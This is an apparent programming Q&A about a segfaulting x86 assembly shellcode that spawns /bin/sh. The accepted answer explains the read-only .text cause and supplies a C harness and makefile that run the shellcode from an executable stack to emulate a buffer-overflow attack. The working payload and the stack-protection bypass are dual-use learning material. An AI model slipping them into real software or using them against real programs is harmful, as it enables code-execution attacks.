# Spawning a shell using ASM

Tags: linux, assembly, x86

I have the following code in asm to spawn a shell - but it crashes giving Segmentation Fault. Can you please suggest what could be the issue.

```
jmp short mycall               ; Immediately jump to the call instruction

shellcode:

    pop        esi                ; Store the address of "/bin/sh" in ESI
    xor        eax, eax           ; Zero out EAX
    mov byte   [esi + 7], al      ; Write the null byte at the end of the string

    mov dword  [esi + 8],  esi    ; [ESI+8], i.e. the memory immediately below the string
                                  ;   "/bin/sh", will contain the array pointed to by the
                                  ;   second argument of execve(2); therefore we store in
                                  ;   [ESI+8] the address of the string...
    mov dword  [esi + 12], eax    ; ...and in [ESI+12] the NULL pointer (EAX is 0)
    mov        al,  0xb           ; Store the number of the syscall (11) in EAX
    lea        ebx, [esi]         ; Copy the address of the string in EBX
    lea        ecx, [esi + 8]     ; Second argument to execve(2)
    lea        edx, [esi + 12]    ; Third argument to execve(2) (NULL pointer)
    int        0x80               ; Execute the system call

mycall:

    call       shellcode          ; Push the address of "/bin/sh" onto the stack
    db         "/bin/sh"
```

Answer (score 2, accepted):

Your shell code is correct. It segfaults on the instruction that tries to NULL terminate the string because `.text` sections are now read-only on all operating systems including Linux.

To successfully run your code, you'd either need to make the `.text` section writable or make the stack or some other data memory executable. Here I demonstrate the later to emulate a buffer overflow attack:

### buggy.c

```
#include <string.h>
#include "shellcode.h"

int main()
{
    char buf[512];
    memcpy(buf, shellcode_bin, shellcode_bin_len);
    ((void(*)(void))buf)();
    return 0;
}
```

### GNUmakefile

```
CFLAGS := -Os -Wall -g3 -I.

NASM_FLAGS := -g -f elf

PROGRAMS := $(basename $(wildcard *.asm *.c))

.PHONY: all clean
all: $(PROGRAMS)
%.o: %.asm
    nasm $(NASM_FLAGS) $< -o $@
clean:
    rm -f $(PROGRAMS) *.o core.* shellcode.bin shellcode.h

.DELETE_ON_ERROR:

shellcode: LDFLAGS := -m32 -nostdlib
shellcode.bin: shellcode
    objcopy --only-section=.text -O binary $< $@

shellcode.h: shellcode.bin
    xxd -i $< > $@

buggy: shellcode.h
buggy: CFLAGS += -m32
buggy: buggy.c
    $(CC) $(CFLAGS) $< $(LDFLAGS) -o $@
    execstack -s $@
```

### Building the Code

```
$ make
nasm -g -f elf shellcode.asm -o shellcode.o
cc -m32 -nostdlib  shellcode.o   -o shellcode
objcopy --only-section=.text -O binary shellcode shellcode.bin
xxd -i shellcode.bin > shellcode.h
cc -Os -Wall -g3 -I. -m32 buggy.c -o buggy
execstack -s buggy
rm shellcode.o
```

### Sample Session

```
$ ./buggy
sh-4.3$
```

### Notes

- `execstack -s buggy` sets the executable stack flag on the ELF binary
- The `xxd` program comes installed with the VIM editor. It's in the `vim-common` package on most Linux distributions.

Comment: Thanks a lot scottt I have been chasing this issue for the past two days.... THANKS